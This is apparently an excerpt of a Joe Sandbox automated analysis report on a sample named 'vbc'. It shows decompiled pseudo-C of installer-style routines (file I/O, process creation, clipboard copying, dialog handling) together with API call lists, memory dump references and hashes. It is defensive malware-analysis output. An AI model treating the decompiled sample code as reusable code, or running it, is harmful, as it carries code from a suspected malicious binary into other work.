GetProcAddress.KERNEL32(00000000,?), ref: 00406A68

Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040615E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406162
0x0040616f
0x00406184
0x0040618a

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406139(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x0040613e
0x00406144
0x00406149
0x00406152
0x00406152
0x0040615b

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C1C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c22
0x00405c2a
0x00000000
0x00405c30
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
GetLastError.KERNEL32 ref: 00405C30

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406210(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00406214
0x00406224
0x0040622c
0x00000000
0x00406233
0x00000000
0x00406235

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 00406224

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061E1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061e5
0x004061f5
0x004061fd
0x00000000
0x00406204
0x00000000
0x00406206

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061F5

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8

Uniqueness

Uniqueness Score: -1.00%

Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040360c
0x00403612

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056D0(0xffffffeb, _t7);
				_t9 = E00405C51(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE6(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

Part of subcall function 00405C51: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F90,00000000), ref: 00405C7A
Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87

CloseHandle.KERNEL32(?), ref: 00401FEB

Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19

Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a84;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f88;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a6c == _t156) {
							ShowWindow( *0x7a8aa8, 8);
							if( *0x7a8b2c == _t156) {
								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
							}
							E004045A3(_t171);
							goto L25;
						}
						 *0x7a0758 = 2;
						E004045A3(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404631(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a70, _t156);
						ShowWindow(_t169, 8);
						E004045FF(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8ab0;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a84 = _t134;
				_v8 = _t134;
				E004045FF( *0x7a7a70);
				 *0x7a7a74 = E00404F58(4);
				 *0x7a7a8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045CA(_a4);
				if(( *0x7a8ab8 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a70, _t156);
					if(( *0x7a8ab8 & 0x00000002) != 0) {
						 *0x7a7a70 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045FF( *0x7a7a68);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8ab8 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405817
0x0040581d
0x00405827
0x0040582a
0x004059c0
0x004059e4
0x004059e4
0x004059f7
0x00405a15
0x00405a17
0x00405a1f
0x00405a75
0x00405a79
0x00000000
0x00000000
0x00405a7b
0x00405a81
0x00000000
0x00000000
0x00405a8b
0x00405a93
0x00405a96
0x00405b98
0x00000000
0x00405b98
0x00405aa5
0x00405ab0
0x00405ab9
0x00405ac4
0x00405ac7
0x00405ad0
0x00405ad6
0x00405ad9
0x00405ad9
0x00405af1
0x00405afa
0x00405afd
0x00405b04
0x00405b0b
0x00405b13
0x00405b13
0x00405b2a
0x00405b2a
0x00405b31
0x00405b37
0x00405b43
0x00405b4a
0x00405b53
0x00405b55
0x00405b58
0x00405b67
0x00405b6a
0x00405b70
0x00405b71
0x00405b77
0x00405b78
0x00405b79
0x00405b81
0x00405b8c
0x00405b92
0x00405b92
0x00000000
0x00405af1
0x00405a27
0x00405a57
0x00405a5f
0x00405a6a
0x00405a6a
0x00405a70
0x00000000
0x00405a70
0x00405a2b
0x00405a35
0x00000000
0x004059f9
0x004059ff
0x00405a3a
0x00000000
0x00405a43
0x00405a08
0x00405a0d
0x00405a10
0x00000000
0x00405a10
0x004059f7
0x00405830
0x00405834
0x0040583c
0x00405840
0x00405843
0x00405846
0x00405849
0x0040584c
0x0040584d
0x0040584e
0x00405867
0x0040586a
0x00405874
0x00405883
0x0040588b
0x00405893
0x00405898
0x0040589b
0x004058a7
0x004058b0
0x004058b9
0x004058db
0x004058e1
0x004058f2
0x004058f7
0x00405905
0x00405913
0x00405913
0x00405918
0x00405926
0x00405926
0x0040592b
0x0040592e
0x00405933
0x0040593f
0x00405948
0x00405955
0x00405964
0x00405957
0x0040595c
0x0040595c
0x00405970
0x00405970
0x00405984
0x0040598d
0x00405996
0x004059a6
0x004059b2
0x004059b2
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040586D
GetDlgItem.USER32(?,000003EE), ref: 0040587C
GetClientRect.USER32 ref: 004058B9
GetSystemMetrics.USER32 ref: 004058C0
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
ShowWindow.USER32(00000000,?), ref: 00405948
ShowWindow.USER32(?,00000008), ref: 0040595C
GetDlgItem.USER32(?,000003EC), ref: 0040597D
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
GetDlgItem.USER32(?,000003F8), ref: 0040588B

Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D

GetDlgItem.USER32(?,000003EC), ref: 004059CF
CreateThread.KERNEL32(00000000,00000000,Function_000057A3,00000000), ref: 004059DD
CloseHandle.KERNEL32(00000000), ref: 004059E4
ShowWindow.USER32(00000000), ref: 00405A08
ShowWindow.USER32(?,00000008), ref: 00405A0D
ShowWindow.USER32(00000008), ref: 00405A57
